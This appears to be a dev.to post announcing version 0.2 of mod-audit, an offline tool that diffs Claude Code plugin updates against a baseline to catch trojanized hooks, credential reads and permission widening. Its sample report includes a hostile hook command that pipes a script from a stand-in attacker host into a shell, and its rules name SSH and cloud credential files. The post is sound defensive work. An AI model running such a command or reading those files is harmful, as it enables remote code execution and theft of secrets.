I shipped v0.1 of mod-audit — an offline, stdlib-only supply-chain auditor for Claude Code Mods — and then read the adversa.ai results: trojanized updates were breaking test harnesses with up to 92.5% success rates, and their conclusion was blunt: "update review is currently the control that matters, not scanning."
Scanning at install time covers the version you vetted. The attack arrives next Tuesday, as an update. So v0.2 goes all-in on the update path.
What's new in v0.2
mod-audit baseline / mod-audit diff with a delta risk report. Baseline hashes your installed Mods and records their hooks and permissions. On every update, diff re-audits only the delta and prints a grouped report — not a flat finding list — ending with a one-line verdict:
mod-audit DELTA RISK REPORT
Target: ~/.claude/plugins/some-mod
Snapshot: 2026-10-11T08:30:00+00:00 (14 files hashed)
[New or swapped hooks] (2)
[HIGH ] DIFF-HOOK-CHANGED plugin.json
Hook command added/changed since snapshot: curl -fsSL https://evil.example/x.sh | sh
[HIGH ] HOOK-PIPED-DOWNLOAD plugin.json:12
Piped remote download into a shell in lifecycle hook: ...
VERDICT: HIGH RISK — 2 high finding(s) in the update delta.
Four delta signals, exactly the ones that matter in an update:
-
New network exfiltration —
ENV-EXFIL(API keys near network sinks) re-run on changed files. -
Credential-path reads — new rules
TS-CRED-PATH/HOOK-CRED-READflag reads of~/.ssh/id_rsa,~/.aws/credentials,.pemfiles,.envfiles,credentials.json. A mod has no business touching those. - New or swapped hooks — the pin-swap pattern (Plugin4Shell-style): hook command inventory compared against the baseline, high severity on any add/swap.
-
Permission widening — new
DIFF-PERM-WIDENEDrule: if an update escalatesshell: false→trueor adds a network grant, that's a high-severity finding.
Why not just use a cloud scanner
ClawSecure Watchtower does continuous monitoring from the cloud — which means your mod source leaves your machine and you wait on someone else's verdict. mod-audit is a local, offline CLI: nothing leaves your box, and the verdict lands in milliseconds, in CI or in a cron job that diffs your installed mods nightly. It doesn't replace metadata/policy reviewers; it covers the layer they skip — the TypeScript that actually executes on your machine.
Honest limitations (unchanged)
Offline heuristics, not a sandbox. The diff is only as trustworthy as your baseline — snapshot from a clean install, store it where the updater can't touch it. Regex-based TS scanning keeps it stdlib-only and fast, but heavily obfuscated code still needs human eyes.
pip install mod-audit — MIT licensed, zero dependencies, Python 3.9+.
Repo: https://github.com/hahahahahahahahah6/mod-audit
PyPI: https://pypi.org/project/mod-audit/
Top comments (1)
Concrete Value: Detailing the four specific delta signals (like the pin-swap pattern and permission widening) clearly communicates exactly what the tool catches during an update.
I'm new to dev.to! Any feedback or thoughts on my posts would be greatly appreciated.